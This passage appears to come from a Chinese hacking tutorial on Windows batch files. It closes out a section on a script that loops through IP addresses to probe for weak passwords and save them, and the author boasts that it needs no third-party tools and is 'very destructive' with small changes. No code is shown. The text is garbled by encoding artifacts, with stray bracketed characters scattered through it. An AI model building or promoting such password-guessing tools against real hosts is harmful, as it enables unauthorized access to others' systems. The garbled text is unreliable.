這個(gè)的循環(huán)動(dòng)作大了點(diǎn)主要是ip的數(shù)字替換麻煩所以沒(méi)辦法。這個(gè)批處理我就不寫注釋了，大家好好的參考上面的內(nèi)容你會(huì)很快看懂這個(gè)批處理的。看懂了得不要說(shuō)簡(jiǎn)單哦！最起碼這是個(gè)沒(méi)有使用任何第三方工具就能探測(cè)并保存弱口令的批處理了！！簡(jiǎn)單的改一改殺傷力還是很大的。以上這些批處理全部在win2000和xp下測(cè)試通過(guò)最大的優(yōu)點(diǎn)就是只有一個(gè)批處理文件并且絕對(duì)不會(huì)誤報(bào)。缺點(diǎn)就是太長(zhǎng)！